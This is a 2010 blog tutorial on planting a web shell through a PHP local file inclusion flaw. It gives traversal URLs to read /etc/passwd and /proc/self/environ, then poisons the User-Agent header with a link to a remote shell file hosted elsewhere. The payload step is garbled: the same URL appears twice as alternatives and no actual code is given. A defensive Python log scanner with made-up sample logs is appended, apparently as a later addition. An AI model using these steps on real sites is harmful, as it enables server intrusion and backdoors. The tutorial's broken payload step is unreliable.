Thursday, April 1, 2010

Shell planting via LFI using the /proc/self/environ method

In this hacking tutorial I will try to show how to plant a shell on the target server via LFI using /proc/self/environ; this was discussed previously in paper no. 361 on the milw0rm website.
OK, let's get started...

1. The first thing to do, as with other techniques, is to find a website that is vulnerable to LFI attacks.

example: http://site.com/info.php?file=news.php

2. Let's replace "news.php" with "../../../".

example: http://site.com/info.php?file=../../../

Then we get an error like the following...

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/Gunslinger/public_html/info.php on line 99

OK, it seems we have the opportunity to include another file.
Next, let's try to find /etc/passwd.

example: http://site.com/info.php?file=etc/passwd
But we still get an error like the following:

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/Gunslinger/public_html/info.php on line 99

What if we go up more directories?
Let's try...

example: http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoy, we managed to get the /etc/passwd file, which looks like the following:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi daemon autoip,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware Abstraction Layer,,,:/var/run/hald:/bin/false
Gunslinger:x:1000:1000:gunslinger_,,,:/home/Gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. Let's check whether we can access /proc/self/environ.
Now replace "/etc/passwd" with "/proc/self/environ":

example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ

If you get something like this:

DOCUMENT_ROOT=/home/Gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9,application/xhtml+xml,image/png,image/jpeg,image/gif,
image/x-xbitmap,*/*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (Jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/Gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at Port 80 www.site.com

Apparently we can access /proc/self/environ!
If you get a blank page, /proc/self/environ cannot be accessed, or the operating system may be *BSD.

4. Now let's inject malicious code by poisoning an HTTP header. How do we inject it? We can use the Tamper Data add-on for Firefox.
You can download it here: https://addons.mozilla.org/en-US/firefox/addon/966
Open Tamper Data in Firefox, then enter the /proc/self/environ URL from before: "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
Then set the User-Agent to the following code:

http://r57.gen.tr/c100.txt

or

http://r57.gen.tr/c100.txt

Then submit.

5. If we managed to inject the malicious code above, the shell will be in a place like this:

http://www.site.com/shell.php
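From the defender's side, the requests in steps 2 to 4 leave a recognisable trail in the web server access log. The following Python script is an added example, not code from the original post: it scans constructed Apache combined-format log lines for the traversal, /etc/passwd, /proc/self/environ and PHP-tag-in-header patterns this post relies on. The log lines, IP addresses and User-Agent marker are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Apr/2010:10:00:01 +0000] "GET /info.php?file=news.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2010:10:00:07 +0000] "GET /info.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 200 1983 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2010:10:00:12 +0000] "GET /info.php?file=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Apr/2010:10:00:20 +0000] "GET /info.php?file=../../../../../../../../../proc/self/environ HTTP/1.1" 200 2300 "-" "<?php echo 'marker'; ?>"
198.51.100.9 - - [01/Apr/2010:10:01:00 +0000] "GET /info.php?file=about.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

def decode(s):
    # Decode twice so double-encoded traversal (%252e%252e%252f) is also caught.
    return unquote(unquote(s))

def classify(line):
    """Return a dict with the matched indicators for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode(m['path']).lower()
    reasons = []
    if '../' in path or '..\\' in path:
        reasons.append('path traversal')
    if '/proc/self/environ' in path:
        reasons.append('proc/self/environ read')
    if '/etc/passwd' in path:
        reasons.append('/etc/passwd read')
    # A PHP open tag in a header only makes sense if the attacker expects it to be included and executed.
    if '<?' in decode(m['ua']) or '<?' in decode(m['ref']):
        reasons.append('php tag in header')
    return {'ip': m['ip'], 'ts': m['ts'], 'status': m['status'], 'reasons': reasons}

def scan(log_text):
    """Return one alert per log line that carries at least one indicator."""
    alerts = []
    for line in log_text.splitlines():
        r = classify(line)
        if r and r['reasons']:
            alerts.append(r)
    return alerts

if __name__ == '__main__':
    for a in scan(SAMPLE_LOG):
        print(a['ts'], a['ip'], a['status'], ', '.join(a['reasons']))
```

A 200 status on a request that reads /proc/self/environ, followed by a PHP tag in a header from the same client, is the sequence this post describes and is worth paging on; a simple sequence of the first two alone is also a reasonable lower-severity signal.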

happy hacking!

Copyright 2010 By Ghiatsudin Asyrofi